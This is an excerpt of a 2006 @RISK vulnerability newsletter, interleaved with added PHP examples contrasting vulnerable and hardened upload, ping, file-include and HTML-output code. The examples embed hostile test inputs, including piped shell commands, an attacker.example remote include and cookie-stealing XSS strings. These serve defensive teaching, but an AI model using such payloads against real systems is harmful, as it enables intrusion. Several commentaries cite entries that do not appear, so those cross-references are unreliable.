  • 06.21.52 - CVE: CVE-2006-2537
  • Platform: Web Application
  • Title: Beats Of Rage Multiple Format String Vulnerabilities
  • Description: Beats Of Rage (BOR) is an open source beat'em up engine available for multiple platforms. OpenBOR and Horizontal Shooter BOR are variants of that engine. Beats of Rage is prone to multiple remote format string vulnerabilities. This issue arises when the application handles specially crafted files. A successful attack may crash the application or lead to arbitrary code execution.
  • Ref: http://aluigi.altervista.org/adv/borfs-adv.txt

  • 06.21.53 - CVE: Not Available
  • Platform: Web Application
  • Title: Russcom PHPImages Arbitrary File Upload
  • Description: Russcom PHPImages is a web-based gallery script. It is prone to an arbitrary file upload vulnerability because the script checks only the extension of an uploaded file, not its contents. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process.
  • Ref: http://www.securityfocus.com/bid/18089
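The extension-only check described above, beside a handler that decides the file type from its content, as an added example that is not Russcom's code. The form field layout (`$_FILES` entry with `tmp_name`/`error`), the destination directory and the accepted image types are assumptions; it needs PHP 7 or later.

```php
<?php
// Added example, not PHPImages' code: an extension-only upload check beside
// a handler that validates the bytes on disk. Field names, destination
// directory and the accepted image types are assumptions.
declare(strict_types=1);

// Vulnerable pattern: only the client-chosen filename is inspected. A PHP
// script saved as "shell.jpg" passes, and so does "shell.php.jpg", which
// Apache mod_mime may still hand to the PHP handler because it evaluates
// every extension of a multi-extension filename.
function accepted_by_extension(string $client_name): bool
{
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    return in_array($ext, ['jpg', 'jpeg', 'gif', 'png'], true);
}

// Hardened pattern, part 1: derive the type from the file content, not from
// the name or the client-supplied $_FILES[...]['type']. Returns the extension
// the server will use, or null when the content is not a recognised image.
function image_extension_from_content(string $path): ?string
{
    $info = @getimagesize($path);            // parses the real image header
    if ($info === false) {
        return null;
    }
    $map = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];
    return $map[$info[2]] ?? null;
}

// Hardened pattern, part 2: store under a server-generated name with the
// extension derived above, in a directory where the web server is configured
// not to execute scripts. move_uploaded_file() refuses any path that is not
// a file PHP itself received through the current POST upload.
function store_upload(array $file, string $dest_dir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $ext = image_extension_from_content($file['tmp_name']);
    if ($ext === null) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // client filename is discarded
    return move_uploaded_file($file['tmp_name'], $dest_dir . '/' . $name) ? $name : null;
}

// Demonstration on constructed files (not real uploads): a PHP payload under
// an image name, then a genuine 1x1 GIF.
$tmp = tempnam(sys_get_temp_dir(), 'upl');
file_put_contents($tmp, "<?php echo 'runs as the web server user'; ?>");
echo accepted_by_extension('shell.jpg') ? "name check: accepted shell.jpg\n" : "name check: rejected shell.jpg\n";
echo image_extension_from_content($tmp) === null ? "content check: rejected PHP payload\n" : "content check: accepted PHP payload\n";

file_put_contents($tmp, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
echo "content check on real GIF: " . (image_extension_from_content($tmp) ?? 'rejected') . "\n";
unlink($tmp);
```

getimagesize() only rejects files that are not images at all; a valid image with PHP appended still passes it. What actually prevents execution is that the stored name and extension are chosen by the server and the upload directory has script execution disabled (for Apache, removing the PHP handler or setting `php_flag engine off` there).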

  • 06.21.54 - CVE: Not Available
  • Platform: Web Application
  • Title: Russcom Ping Remote Arbitrary Command Execution
  • Description: Russcom Ping is a web-based ping script. A specially crafted request can append arbitrary shell commands, separated by pipe "|" characters, to the string the script passes to the "system()" function, resulting in command execution with the privileges of the web server process.
  • Ref: http://www.securityfocus.com/bid/18090
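The system()-with-pipe pattern described above beside a hardened version, as an added example that is not Russcom's code. The request parameter name ("host") and the ping command line are assumptions; FILTER_VALIDATE_DOMAIN needs PHP 7 or later.

```php
<?php
// Added example, not Russcom Ping's code: a request value spliced into a
// shell command line, beside validation plus quoting. Parameter name and
// ping options are assumptions.
declare(strict_types=1);

// Vulnerable pattern: system()/shell_exec() hand the string to /bin/sh, so
// host=127.0.0.1|id makes the shell run "ping -c 1 127.0.0.1 | id";
// ";", "&&" and "$(...)" work the same way.
function ping_command_vulnerable(string $host): string
{
    return 'ping -c 1 ' . $host;          // caller does system($cmd)
}

// Hardened pattern: accept only an IP address or a hostname, then quote the
// value with escapeshellarg() so it reaches ping as a single argument.
// The hostname rule also rejects values starting with "-", which quoting
// alone would still deliver to ping as an option (argument injection).
function ping_command_safe(string $host): ?string
{
    $is_ip   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $is_name = filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
    if (!$is_ip && !$is_name) {
        return null;
    }
    return 'ping -c 1 ' . escapeshellarg($host);
}

// Execution is separated from command construction so the builder can be
// exercised without running ping.
function run_ping(string $host): string
{
    $cmd = ping_command_safe($host);
    if ($cmd === null) {
        return "rejected: not a valid IP address or hostname\n";
    }
    return (string) shell_exec($cmd . ' 2>&1');   // escape before echoing into HTML
}

// Constructed inputs; nothing below is executed, only the command strings are shown.
$inputs = ['127.0.0.1', 'example.com', '127.0.0.1|id', '127.0.0.1; cat /etc/passwd', '-f'];
foreach ($inputs as $input) {
    printf("%-28s vulnerable: %s\n", $input, ping_command_vulnerable($input));
    printf("%-28s safe:       %s\n", '', ping_command_safe($input) ?? '(rejected)');
}
```

Where the PHP version allows it, not invoking a shell at all is better still: proc_open() accepts the command as an array of arguments from PHP 7.4, so the value is passed straight to ping's argv with no shell metacharacter parsing in between. Input validation stays necessary either way, because of the option-injection case.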

  • 06.21.55 - CVE: Not Available
  • Platform: Web Application
  • Title: HP OpenView Network Node Manager Multiple Remote Vulnerabilities
  • Description: HP OpenView Network Node Manager is a fault management application for IP networks. It is prone to multiple remote vulnerabilities: unauthorized privileged access, arbitrary command execution and arbitrary file creation. Attackers may exploit these issues to execute arbitrary commands in the context of the affected process, create arbitrary files, or gain privileged access.
  • Ref: http://www.openview.hp.com/products/nnm/

  • 06.21.56 - CVE: Not Available
  • Platform: Web Application
  • Title: Nucleus CMS GLOBALS[DIR_LIBS] Parameter Remote File Include
  • Description: Nucleus CMS is a web-based content management system. It is affected by a remote file include issue because the "nucleus/libs/PLUGINADMIN.php" script uses the "GLOBALS[DIR_LIBS]" variable in an include path without sufficient sanitization, allowing a request to supply the path that the script expects its configuration to have set.
  • Ref: http://www.securityfocus.com/bid/18097
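The request-controlled include() pattern behind both the phpBazar "language_dir" issue and the Nucleus CMS "GLOBALS[DIR_LIBS]" issue above, beside a version that maps the request value onto a fixed set of files, as an added example that is neither project's code. The parameter names, the language list, the directory layout and the IN_APP marker constant are assumptions; it needs PHP 7 or later.

```php
<?php
// Added example, not phpBazar's or Nucleus CMS's code: two request-controlled
// include() patterns and an allow-listed replacement. Parameter names,
// language list, directory layout and the IN_APP constant are assumptions.
declare(strict_types=1);

// Vulnerable pattern 1: a request parameter becomes part of an include path.
// With allow_url_fopen/allow_url_include enabled, ?language_dir=http://attacker.example/
// makes PHP fetch and execute attacker-hosted code; with remote wrappers off,
// traversal such as ../../../../etc/passwd still discloses local files.
function load_language_vulnerable(string $language_dir): void
{
    include $language_dir . '/lang.php';
}

// Vulnerable pattern 2: a library script trusts a variable it expects the
// application's config to have set. Requested directly with register_globals
// on, the request can supply $DIR_LIBS instead.
function load_plugin_admin_vulnerable(string $DIR_LIBS): void
{
    include $DIR_LIBS . 'PLUGINADMIN.php';
}

// Hardened library script guard: refuse to run unless the application entry
// point defined a marker first, so a direct request cannot feed it variables.
function require_app_entry(): void
{
    if (!defined('IN_APP')) {
        http_response_code(403);
        exit('direct access not allowed');
    }
}

// Hardened include: the request value is only a key into an allow list, the
// path is built from a fixed base, and the result is checked to lie inside it.
function resolve_language_file(string $requested, array $allowed, string $base_dir): ?string
{
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $path = realpath($base_dir . '/' . $requested . '/lang.php');
    $base = realpath($base_dir);
    if ($path === false || $base === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function load_language_safe(string $requested): void
{
    $path = resolve_language_file($requested, ['en', 'de', 'fr'], __DIR__ . '/lang');
    include ($path ?? __DIR__ . '/lang/en/lang.php');
}

// Demonstration against a constructed directory tree in the temp dir.
$base = sys_get_temp_dir() . '/rfi_demo_' . bin2hex(random_bytes(4));
mkdir($base . '/en', 0700, true);
file_put_contents($base . '/en/lang.php', "<?php \$LANG = ['hello' => 'Hello'];\n");

foreach (['en', 'http://attacker.example/', '../../../../etc/passwd', "en\0"] as $input) {
    $resolved = resolve_language_file($input, ['en', 'de', 'fr'], $base);
    printf("%-28s -> %s\n", addcslashes($input, "\0"), $resolved ?? '(rejected)');
}
unlink($base . '/en/lang.php');
rmdir($base . '/en');
rmdir($base);
```

The allow list is the control; the realpath() check is defence in depth against a later edit that relaxes it. On the server side, register_globals=Off (the option was removed in PHP 5.4) and allow_url_include=Off (available from PHP 5.2) close both patterns for code that has not been fixed yet.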

  • 06.21.57 - CVE: Not Available
  • Platform: Web Application
  • Title: Elite-Board Search Page HTML Injection
  • Description: Elite-Board is a web-based bulletin board application. Insufficient sanitization of user-supplied input on its search page exposes the application to an HTML injection issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18103
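The HTML injection pattern shared by the Stylish Text Ads, Short Url & Url Tracker, ipLogger and Elite-Board entries above, beside context-aware output escaping, as an added example that is not any of those projects' code. The visitor record layout (IP, referer, User-Agent, as ipLogger collects), the search-page markup and the sample request values are constructed assumptions; ENT_SUBSTITUTE needs PHP 5.4 or later.

```php
<?php
// Added example, none of the listed projects' code: values concatenated into
// HTML beside escaping chosen for each output context. Field names, markup
// and the sample request are constructed.
declare(strict_types=1);

// Vulnerable pattern: request data goes straight into the page. Request
// headers such as User-Agent and Referer are as attacker-controlled as form
// fields, so a visitor can plant markup that runs in whoever views the log.
function visitor_row_vulnerable(array $v): string
{
    return "<tr><td>{$v['ip']}</td><td><a href=\"{$v['referer']}\">{$v['referer']}</a></td>"
         . "<td>{$v['useragent']}</td></tr>\n";
}

// Escaping for HTML text and attribute values. ENT_QUOTES also covers
// single-quoted attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// A value placed in href needs validation on top of escaping: escaping stops
// it breaking out of the attribute, but a "javascript:" URL would still run.
function safe_http_url(string $url): ?string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true) || filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    return $url;
}

function visitor_row(array $v): string
{
    $ref  = safe_http_url($v['referer']);
    $cell = $ref === null ? h($v['referer']) : '<a href="' . h($ref) . '">' . h($ref) . '</a>';
    return '<tr><td>' . h($v['ip']) . '</td><td>' . $cell . '</td><td>' . h($v['useragent']) . "</td></tr>\n";
}

// Reflected case (the search-page pattern): the same rule, every echoed value escaped.
function search_heading(string $term): string
{
    return '<h2>Results for "' . h($term) . '"</h2>';
}

// Constructed request values; not taken from any real log.
$visit = [
    'ip'        => '203.0.113.7',
    'referer'   => 'javascript:alert(document.cookie)',
    'useragent' => 'Mozilla/5.0 <script>alert("ua")</script>',
];
echo "vulnerable: ", visitor_row_vulnerable($visit);
echo "escaped:    ", visitor_row($visit);
echo search_heading('<img src=x onerror=alert(1)>'), "\n";
```

The rule the escaped version follows is escape at output, per context, rather than "sanitize" at input: the same stored User-Agent string may later go into an HTML cell, an attribute, a JSON response or a log file, and each of those needs its own encoding.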

  • 06.21.58 - CVE: CVE-2006-2587
  • Platform: Web Application
  • Title: PunkBuster WebTool WebKey Parameter Remote Buffer Overflow
  • Description: PunkBuster is an anti-cheat system used in many popular games. It can boot players who try to bypass certain restrictions. WebTool is an HTTP server supplied with the application. PunkBuster WebTool is prone to a remote buffer overflow vulnerability. A remote unauthenticated attacker can trigger this issue through an HTTP GET or POST request. PunkBuster versions prior to 1.229 are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/archive/1/434909

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.